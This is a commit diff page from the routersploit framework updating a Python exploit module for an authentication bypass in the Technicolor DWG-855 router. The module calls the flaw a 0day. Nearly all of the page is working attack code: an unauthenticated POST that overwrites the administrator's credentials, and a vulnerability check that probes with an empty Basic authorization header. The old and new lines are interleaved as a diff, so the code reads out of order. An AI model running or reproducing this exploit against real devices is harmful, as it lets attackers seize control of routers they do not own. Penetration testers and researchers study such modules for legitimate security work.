Skip to content

R
routersploit
Commit 2d2b24c2 by 0BuRner Committed by GitHub
Options

Update dwg855_authbypass.py

parent ca1f5377
Showing with 29 additions and 15 deletions
routersploit/modules/exploits/technicolor/dwg855_authbypass.py
import base64
import binascii
from routersploit import(
from routersploit import (
exploits,
print_success,
print_error,
print_status,
sanitize_url,
http_request,
mute
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability.
......@@ -16,10 +17,10 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.',
'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.\nNOTE2: run \"check\" after runing module to see if it worked.',
'authors': [
'JPaulMora', # vulnerability discovery
'JPaulMora <https://JPaulMora.GitHub.io>', # routersploit module
'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.',
'author': [
'JPaulMora <https://JPaulMora.GitHub.io>',
# vulnerability discovery,routersploit module
],
'references': [
'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
......@@ -35,24 +36,35 @@ class Exploit(exploits.Exploit):
npass = exploits.Option('rpass', 'Overwrite old password with.. ')
def run(self):
print_status("Changing " + self.target + " credentials to " + self.nuser + ":" + self.npass)
url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = {"HttpUserId":self.nuser, "Password":self.npass, "PasswordReEnter":self.npass, "RestoreFactoryNo":"0x00"}
data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
response = http_request(method="POST", url=url, headers=headers, data=data)
return ""
@mute
if response is None:
print_error("Target didn't answer request.")
elif vulnresp in response.text.encode('utf-8'):
print_success("Credentials changed!")
elif response.status_code == 401:
print_error("Target answered, denied access.")
else:
print_error("Unknown error, submit an issue.")
def check(self):
url = sanitize_url("{}:{}/RgConnect.asp".format(self.target, self.port))
# The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
vulnresp = binascii.unhexlify('114475636b7900') # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
authorization = 'Basic {}'.format(base64.b64encode(self.nuser + ':' + self.npass))
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Authorization': authorization,
'Authorization': 'Og==', # this is base64(":")
'Cache-Control': 'no-cache',
'Connection': 'close'}
......@@ -60,7 +72,9 @@ class Exploit(exploits.Exploit):
if response is None:
return False # target is not vulnerable
if response.status_code == 401:
elif vulnresp in response.text.encode('utf-8'):
return True # device is vulnerable
elif response.status_code == 401:
return False # target is not vulnerable
else:
return True # device is vulnerable
return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment